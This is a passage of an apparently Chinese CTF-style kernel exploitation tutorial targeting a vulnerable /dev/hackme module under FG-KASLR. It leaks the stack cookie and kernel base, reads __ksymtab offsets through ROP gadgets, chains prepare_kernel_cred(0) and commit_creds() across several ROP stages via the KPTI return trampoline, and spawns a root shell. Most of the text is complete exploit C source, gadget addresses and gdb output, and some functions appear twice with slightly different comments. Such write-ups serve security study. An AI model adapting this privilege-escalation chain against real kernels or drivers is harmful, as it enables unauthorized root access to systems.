需要注意的是,这里所说的“不参与随机化”并不是真的不随机化,但它们是与kernel base一起随机化,而不是每个节区单独随机化,因此,相对于kernel base,这些节是保持固定偏移的。因此,泄露了kernel base后就可以获得这些节区的地址。

5.2.2 泄露内核基地址

在hackme_read函数中下断点,观察栈上是否有.text段中的地址。可以先查看kallsyms文件,查看_text符号的地址,即内核(.text)基地址,再加上.text的段大小0x400dd7,就能知道.text段的范围了:

可以看到,.text的范围应是 0xffffffffac000000 ~ 0xffffffffac400dd7

在hackme_read函数中调用copy_to_user的位置下断点,查看rsi寄存器就能看到泄露的内容了,在这里面查找.text范围内的值:

在偏移38处找到一个.text段的地址!这样内核基地址就有了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
unsigned long cookie;      // stack cookie
unsigned long kernel_leak; // raw .text address found in the leak
unsigned long kernel_base; // kernel_leak minus its fixed offset

/*
 * Read 50 words from the device and extract the stack cookie (word 16) and
 * a kernel .text address (word 38), from which the kernel base is derived.
 *
 * Exits with status -1 if the read fails or returns too few bytes to contain
 * both values, so later stages never run on garbage addresses.
 */
void leak_cookie_kernel(void){
    enum { LEAK_WORDS = 50, COOKIE_IDX = 16, KTEXT_IDX = 38 };
    unsigned long leak[LEAK_WORDS];
    ssize_t r = read(global_fd, leak, sizeof(leak));

    if (r < (ssize_t)((KTEXT_IDX + 1) * sizeof(leak[0]))) {
        printf("[!] Leak failed: read returned %zd\n", r);
        exit(-1);
    }
    cookie = leak[COOKIE_IDX];     // 0x80 bytes past the start of tmp
    kernel_leak = leak[KTEXT_IDX]; // 0x130 bytes past the start of tmp
    kernel_base = kernel_leak - 0xa157;

    printf("[*] Leaked %zd bytes\n", r);
    //print_leak(leak, LEAK_WORDS);
    printf("[*] Cookie: %lx\n", cookie);
    printf("[*] Kernel Base: %lx\n", kernel_base);
}
1
2
3
4
5
6
7
8
/ $ ./exp_fgkaslr
[*] Saved state
[*] Opened device
[*] Leaked 400 bytes
[*] Cookie: cacb7526b9820f00
[*] Kernel Base: ffffffff89000000
/ $

5.2.3 内核符号表ksymtab

ksymtab是内核中的符号表,参考stackoverflow - what is __ksymtab? in linux kernel,在__ksymtab段中,而在kallsyms文件中,__start___ksymtab符号代表这个段的起始地址,而每个内核符号的条目,则以__ksymtab_<symbol_name>来命名:

正如5.2.1中所说,__ksymtab内核符号表这个段与kernel base的偏移是固定的,因此,泄露了内核基地址后,就可以根据固定的偏移来找到内核符号表中的每一个条目了。

条目的结构https://elixir.bootlin.com/linux/v5.9-rc6/source/include/linux/export.h#L60

1
2
3
4
5
6
/*
 * One __ksymtab entry. The fields are 32-bit signed offsets rather than
 * absolute pointers.
 */
struct kernel_symbol {
int value_offset; // symbol address = address of this entry + value_offset
int name_offset; // name string = address of this field (entry + 4) + name_offset
int namespace_offset; // presumably resolved the same way, relative to this field — TODO confirm
};

里边的value_offset就是我们用来泄露符号地址的值了,它是符号地址与__ksymtab_<symbol_name>的偏移。以prepare_kernel_cred为例:

1
2
3
4
5
6
/ $ cat ./kallsyms | grep prepare_kernel_cred
ffffffff81614900 T prepare_kernel_cred
ffffffff8218d4fc r __ksymtab_prepare_kernel_cred
ffffffff821a09b2 r __kstrtab_prepare_kernel_cred
ffffffff821a4d42 r __kstrtabns_prepare_kernel_cred

gdb中验证:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(gdb) x/3wx 0xffffffff8218d4fc
0xffffffff8218d4fc: 0xff487404 0x000134b2 0x0001783e
(gdb) x/10i 0xffffffff8218d4fc + (signed int)0xff487404
0xffffffff81614900: nopl 0x0(%rax,%rax,1)
0xffffffff81614905: push %rbp
0xffffffff81614906: mov $0xcc0,%esi
0xffffffff8161490b: mov %rsp,%rbp
0xffffffff8161490e: push %r12
0xffffffff81614910: mov %rdi,%r12
0xffffffff81614913: mov 0x10d1c36(%rip),%rdi # 0xffffffff826e6550
0xffffffff8161491a: push %rbx
0xffffffff8161491b: callq 0xffffffff816f93d0
0xffffffff81614920: test %rax,%rax
(gdb) x/s 0xffffffff8218d4fc + 4 + (signed int)0x000134b2
0xffffffff821a09b2: "prepare_kernel_cred"
(gdb)

5.2.4 泄露内核符号

现在能泄露内核基地址、内核符号表地址,剩下的就是在.text段里寻找合适的能够从符号表中读取内容的gadget了。用cat ./gadget.txt | grep 0xffffffff810 |grep "***"过滤一下指令的地址就可以了

1
2
3
0xffffffff81015a80: mov eax, dword ptr [rax]; pop rbp; ret;
0xffffffff81004d11: pop rax; ret;

通过ROP执行这两条gadget,就能读取内存到rax寄存器中了,即从内核符号表条目中读取内核函数的value_offset。泄露完之后不太好直接在同一条ROP链里去调用目标函数,可以通过3.2节中使用的swapgs_restore_regs_and_return_to_usermode安全地切换回用户态页表、返回用户态中去,再进行后续的利用。

由于在swapgs_restore_regs_and_return_to_usermode的过程中,rax和rsi寄存器的值没有改变,所以我这里分别将ROP中读取到的两个内核函数的value_offset存到rsi、rax寄存器中,并将iretq返回时的rip指定为exp中的用户态函数calc_kernel_symbols,在calc_kernel_symbols函数的开头,通过内联汇编,将存在rsi、rax中的value_offset取出来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void calc_kernel_symbols(void);
unsigned long ksymtab_commit_creds;        // address of the __ksymtab entry for commit_creds
unsigned long ksymtab_prepare_kernel_cred; // address of the __ksymtab entry for prepare_kernel_cred

/*
 * First ROP stage: read the value_offset field of the two __ksymtab entries.
 *
 * The chain leaves prepare_kernel_cred's offset in rsi and commit_creds'
 * offset in rax, then returns to userland at calc_kernel_symbols() through
 * the KPTI trampoline. Words 0..15 of the buffer are left untouched; the
 * chain starts at word 16, the stack cookie slot.
 */
void leak_kernel_symbols(void){
    enum { PAYLOAD_WORDS = 50, COOKIE_IDX = 16 };
    unsigned long payload[PAYLOAD_WORDS];

    ksymtab_commit_creds = kernel_base + 0xf87d90;
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fc;

    const unsigned long load_eax = kernel_base + 0x15a80;  // mov eax, dword ptr [rax]; pop rbp; ret;
    const unsigned long pop_rax = kernel_base + 0x4d11;    // pop rax; ret;
    const unsigned long rax_to_rsi = kernel_base + 0xdb06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;

    const unsigned long chain[] = {
        cookie,
        0x0, // rbx
        0x0, // r12
        0x0, // rbp

        // esi = value_offset of the prepare_kernel_cred entry
        pop_rax,
        ksymtab_prepare_kernel_cred,
        load_eax,
        0,
        rax_to_rsi,
        0,

        // eax = value_offset of the commit_creds entry
        pop_rax,
        ksymtab_commit_creds,
        load_eax,
        0,

        // switch to the user-space cr3, swapgs and iretq
        kernel_base + 0x200f26, // swapgs_restore_regs_and_return_to_usermode
        0,
        0,
        (unsigned long)calc_kernel_symbols,
        user_cs,
        user_rflags,
        user_sp,
        user_ss,
    };

    for (unsigned i = 0; i < sizeof(chain) / sizeof(chain[0]); i++)
        payload[COOKIE_IDX + i] = chain[i];

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));
    (void)w;

    puts("[!] Should never be reached");
}

signed int offset_commit_creds; // value_offset read from the commit_creds entry
signed int offset_prepare_kernel_cred; // value_offset read from the prepare_kernel_cred entry
unsigned long prepare_kernel_cred; // resolved address of prepare_kernel_cred
unsigned long commit_creds; // resolved address of commit_creds
/*
 * Userland landing point of the leak ROP chain: pick up the two offsets the
 * chain left in esi/eax and turn them into absolute function addresses.
 */
void calc_kernel_symbols(void){

// The asm is the first statement so esi/eax are stored before any compiled
// code can overwrite them.
// NOTE(review): relies on the function prologue leaving esi/eax untouched —
// confirm for the compiler flags in use.
__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
// The offsets are signed ints, so a negative offset moves backwards from the entry.
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);
}

成功泄露内核函数的地址:

5.2.5 ROP提权

commit_creds和prepare_kernel_cred的地址泄露出来后,就可以进行最终的ROP,完成提权了。

这里,我还是分开两次来进行ROP,第一次ROP调用prepare_kernel_cred(0),将返回值存到rsi寄存器后,返回用户态函数,在用户态函数中将rsi寄存器中的root cred地址取出,然后再进行一次ROP调用commit_creds(root_cred)。

因为.text段中没找到能将rax赋给rdi的gadget,就无法直接在ROP中将prepare_kernel_cred(0)的返回值作为参数传给commit_creds()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
/*
 * Userland landing point of the leak ROP chain: pick up the two offsets the
 * chain left in esi/eax, turn them into absolute function addresses, then
 * start the next ROP stage.
 */
void calc_kernel_symbols(void){

// The asm is the first statement so esi/eax are stored before any compiled
// code can overwrite them.
// NOTE(review): relies on the function prologue leaving esi/eax untouched —
// confirm for the compiler flags in use.
__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
// Each address is the __ksymtab entry address plus the offset read from it.
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);

// Second ROP stage: call prepare_kernel_cred(0) in the kernel.
rop_prepare_kernel_cred();
}

/*
 * Second ROP stage: call prepare_kernel_cred(0), copy its return value from
 * rax into rsi, and return to userland at rop_commit_cred() through the
 * KPTI trampoline. Words 0..15 of the buffer are left untouched; the chain
 * starts at word 16, the stack cookie slot.
 */
void rop_prepare_kernel_cred(void){
    enum { PAYLOAD_WORDS = 50, COOKIE_IDX = 16 };
    unsigned long payload[PAYLOAD_WORDS];
    const unsigned long chain[] = {
        cookie,
        0x0, // rbx
        0x0, // r12
        0x0, // rbp

        // prepare_kernel_cred(0)
        kernel_base + 0x6370, // pop rdi; ret;
        0,
        prepare_kernel_cred,
        kernel_base + 0xdb06, // mov rsi, rax; mov rax, rsi; pop rbp; ret;
        0,

        // switch to the user-space cr3, swapgs and iretq
        kernel_base + 0x200f26, // swapgs_restore_regs_and_return_to_usermode
        0,
        0,
        (unsigned long)rop_commit_cred,
        user_cs,
        user_rflags,
        user_sp,
        user_ss,
    };

    for (unsigned i = 0; i < sizeof(chain) / sizeof(chain[0]); i++)
        payload[COOKIE_IDX + i] = chain[i];

    puts("[*] ROP prepare_kernel_cred(0)");
    ssize_t w = write(global_fd, payload, sizeof(payload));
    (void)w;

    puts("[!] Should never be reached");
}

unsigned long root_cred; // cred pointer returned by prepare_kernel_cred(0)

/*
 * Third ROP stage and userland landing point of the second one: pick up the
 * cred pointer the previous chain left in rsi, then call
 * commit_creds(root_cred) in the kernel and return to get_shell().
 */
void rop_commit_cred(void){
    // Must stay the first statement: rsi still holds the value left by the
    // previous ROP chain.
    __asm__(
        ".intel_syntax noprefix;"
        "mov root_cred, rsi;"
        ".att_syntax;"
    );

    printf("[*] root_cred: %lx\n", root_cred);

    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16; // the chain starts at the stack cookie slot

    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp

    // commit_creds(root_cred)
    // The gadget is addressed as base + offset like every other gadget in the
    // KASLR exploit; adding kernel_base to an absolute address would be wrong.
    payload[off++] = kernel_base + 0x0000000000006370; // pop rdi; ret;
    payload[off++] = root_cred;
    payload[off++] = commit_creds;

    // switch to the user-space cr3, swapgs and iretq
    payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
    payload[off++] = 0;
    payload[off++] = 0;
    payload[off++] = (unsigned long)get_shell;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;

    puts("[*] rop commit_cred(root_cred)");
    ssize_t w = write(global_fd, payload, sizeof(payload));

    puts("[!] Should never be reached");
}

// Userland landing point: check the current uid and, if it is root, run system("/bin/sh").
void get_shell(void){
    puts("[*] Returned to userland");
    if (getuid() == 0){
        printf("[*] UID: %d, got root!\n", getuid());
        system("/bin/sh");
        // This function is reached through an iretq frame built by the ROP
        // chain, not a call, so there is no valid return address once the
        // shell exits; terminate explicitly instead of returning.
        exit(0);
    } else {
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
}

总结EXP

总结整个利用过程:

  • 泄露内核基地址
  • 在.text段中寻找gadget
  • 读取内核符号表中的偏移,计算出目标内核函数的地址
  • 进行多次ROP完成提权语句的执行
  • 返回用户态get shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>

/* Forward declarations: the ROP stages reference functions defined further down. */
void open_dev();
void save_state();
void leak_cookie_kernel(void);
void leak_kernel_symbols(void);
void calc_kernel_symbols(void);
void rop_prepare_kernel_cred(void);
void rop_commit_cred(void);
void get_shell(void);


int global_fd; // descriptor of /dev/hackme, shared by every stage

// Open the /dev/hackme device read-write; exit with status -1 on failure.
void open_dev(){
    global_fd = open("/dev/hackme", O_RDWR);

    if (global_fd >= 0){
        puts("[*] Opened device");
        return;
    }

    puts("[!] Failed to open device");
    exit(-1);
}

// Userland register values that every iretq frame in the ROP chains reuses.
unsigned long user_cs, user_ss, user_rflags, user_sp;

// Save the registers that a later iretq has to restore (cs, ss, rsp, rflags)
// into the globals above.
void save_state(){
// Intel syntax is enabled only inside this block and switched back to AT&T
// at the end. rflags is copied via the stack: pushf, then pop into the global.
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

/*
 * Debug helper: print the first n words of a leaked buffer, one per line,
 * as "<index>: <value in hex>".
 */
void print_leak(unsigned long *leak, unsigned n) {
    unsigned idx = 0;

    while (idx < n) {
        printf("%u: %lx\n", idx, leak[idx]);
        idx++;
    }
}

unsigned long cookie;      // stack cookie
unsigned long kernel_leak; // raw .text address found in the leak
unsigned long kernel_base; // kernel_leak minus its fixed offset

/*
 * Read 50 words from the device and extract the stack cookie (word 16) and
 * a kernel .text address (word 38), from which the kernel base is derived.
 *
 * Exits with status -1 if the read fails or returns too few bytes to contain
 * both values, so later stages never run on garbage addresses.
 */
void leak_cookie_kernel(void){
    enum { LEAK_WORDS = 50, COOKIE_IDX = 16, KTEXT_IDX = 38 };
    unsigned long leak[LEAK_WORDS];
    ssize_t r = read(global_fd, leak, sizeof(leak));

    if (r < (ssize_t)((KTEXT_IDX + 1) * sizeof(leak[0]))) {
        printf("[!] Leak failed: read returned %zd\n", r);
        exit(-1);
    }
    cookie = leak[COOKIE_IDX];     // 0x80 bytes past the start of tmp
    kernel_leak = leak[KTEXT_IDX]; // 0x130 bytes past the start of tmp
    kernel_base = kernel_leak - 0xa157;

    printf("[*] Leaked %zd bytes\n", r);
    //print_leak(leak, LEAK_WORDS);
    printf("[*] Cookie: %lx\n", cookie);
    printf("[*] Kernel Base: %lx\n", kernel_base);
}

unsigned long ksymtab_commit_creds;        // address of the __ksymtab entry for commit_creds
unsigned long ksymtab_prepare_kernel_cred; // address of the __ksymtab entry for prepare_kernel_cred

/*
 * First ROP stage: read the value_offset field of the two __ksymtab entries.
 *
 * The chain leaves prepare_kernel_cred's offset in rsi and commit_creds'
 * offset in rax, then returns to userland at calc_kernel_symbols() through
 * the KPTI trampoline. Words 0..15 of the buffer are left untouched; the
 * chain starts at word 16, the stack cookie slot.
 */
void leak_kernel_symbols(void){
    enum { PAYLOAD_WORDS = 50, COOKIE_IDX = 16 };
    unsigned long payload[PAYLOAD_WORDS];

    ksymtab_commit_creds = kernel_base + 0xf87d90;
    ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fc;

    const unsigned long load_eax = kernel_base + 0x15a80;  // mov eax, dword ptr [rax]; pop rbp; ret;
    const unsigned long pop_rax = kernel_base + 0x4d11;    // pop rax; ret;
    const unsigned long rax_to_rsi = kernel_base + 0xdb06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;

    const unsigned long chain[] = {
        cookie,
        0x0, // rbx
        0x0, // r12
        0x0, // rbp

        // esi = value_offset of the prepare_kernel_cred entry
        pop_rax,
        ksymtab_prepare_kernel_cred,
        load_eax,
        0,
        rax_to_rsi,
        0,

        // eax = value_offset of the commit_creds entry
        pop_rax,
        ksymtab_commit_creds,
        load_eax,
        0,

        // switch to the user-space cr3, swapgs and iretq
        kernel_base + 0x200f26, // swapgs_restore_regs_and_return_to_usermode
        0,
        0,
        (unsigned long)calc_kernel_symbols,
        user_cs,
        user_rflags,
        user_sp,
        user_ss,
    };

    for (unsigned i = 0; i < sizeof(chain) / sizeof(chain[0]); i++)
        payload[COOKIE_IDX + i] = chain[i];

    puts("[*] ROP leak kernel functions");
    ssize_t w = write(global_fd, payload, sizeof(payload));
    (void)w;

    puts("[!] Should never be reached");
}

signed int offset_commit_creds; // value_offset read from the commit_creds entry
signed int offset_prepare_kernel_cred; // value_offset read from the prepare_kernel_cred entry
unsigned long prepare_kernel_cred; // resolved address of prepare_kernel_cred
unsigned long commit_creds; // resolved address of commit_creds
/*
 * Userland landing point of the leak ROP chain: pick up the two offsets the
 * chain left in esi/eax, turn them into absolute function addresses, then
 * start the next ROP stage.
 */
void calc_kernel_symbols(void){

// The asm is the first statement so esi/eax are stored before any compiled
// code can overwrite them.
// NOTE(review): relies on the function prologue leaving esi/eax untouched —
// confirm for the compiler flags in use.
__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
// Each address is the __ksymtab entry address plus the signed offset read from it.
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);

// Second ROP stage: call prepare_kernel_cred(0) in the kernel.
rop_prepare_kernel_cred();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
/*
 * Second ROP stage: call prepare_kernel_cred(0), copy its return value from
 * rax into rsi, and return to userland at rop_commit_cred() through the
 * KPTI trampoline. Words 0..15 of the buffer are left untouched; the chain
 * starts at word 16, the stack cookie slot.
 */
void rop_prepare_kernel_cred(void){
    enum { PAYLOAD_WORDS = 50, COOKIE_IDX = 16 };
    unsigned long payload[PAYLOAD_WORDS];
    const unsigned long chain[] = {
        cookie,
        0x0, // rbx
        0x0, // r12
        0x0, // rbp

        // prepare_kernel_cred(0)
        kernel_base + 0x6370, // pop rdi; ret;
        0,
        prepare_kernel_cred,
        kernel_base + 0xdb06, // mov rsi, rax; mov rax, rsi; pop rbp; ret;
        0,

        // switch to the user-space cr3, swapgs and iretq
        kernel_base + 0x200f26, // swapgs_restore_regs_and_return_to_usermode
        0,
        0,
        (unsigned long)rop_commit_cred,
        user_cs,
        user_rflags,
        user_sp,
        user_ss,
    };

    for (unsigned i = 0; i < sizeof(chain) / sizeof(chain[0]); i++)
        payload[COOKIE_IDX + i] = chain[i];

    puts("[*] ROP prepare_kernel_cred(0)");
    ssize_t w = write(global_fd, payload, sizeof(payload));
    (void)w;

    puts("[!] Should never be reached");
}

// Third ROP stage and userland landing point of the second one: pick up the
// cred pointer the previous chain left in rsi, then call
// commit_creds(root_cred) in the kernel and return to get_shell().
unsigned long root_cred;
void rop_commit_cred(void){
// Must stay the first statement: rsi still holds the value left by the
// previous ROP chain.
// NOTE(review): relies on the function prologue leaving rsi untouched —
// confirm for the compiler flags in use.
__asm__(
".intel_syntax noprefix;"
"mov root_cred, rsi;"
".att_syntax;"
);

printf("[*] root_cred: %lx\n", root_cred);

unsigned n = 50;
unsigned long payload[n];
// Words 0..15 are left untouched; the chain starts at the stack cookie slot.
unsigned off = 16;

payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(root_cred)
payload[off++] = kernel_base + 0x0000000000006370; // pop rdi; ret;
payload[off++] = root_cred;
payload[off++] = commit_creds;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)get_shell;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] rop commit_cred(root_cred)");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

// Userland landing point: check the current uid and, if it is root, run system("/bin/sh").
void get_shell(void){
    puts("[*] Returned to userland");
    if (getuid() == 0){
        printf("[*] UID: %d, got root!\n", getuid());
        system("/bin/sh");
        // This function is reached through the iretq frame built by
        // rop_commit_cred(), not a call, so there is no valid return address
        // once the shell exits; terminate explicitly instead of returning.
        exit(0);
    } else {
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
}

/*
 * Exploit driver: save the userland state, open the device, leak the cookie
 * and kernel base, then start the chain of ROP stages. On success control
 * never comes back here.
 */
int main() {
    save_state();           // cs/ss/rsp/rflags for the iretq frames
    open_dev();             // sets global_fd
    leak_cookie_kernel();   // cookie + kernel_base
    leak_kernel_symbols();  // first ROP stage; continues in calc_kernel_symbols()

    puts("[!] Should never be reached");
    return 0;
}


/*
swapgs_restore_regs_and_return_to_usermode+20:

0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq

*/

Comments Section | 评论区
Privacy Policy Application Terms of Service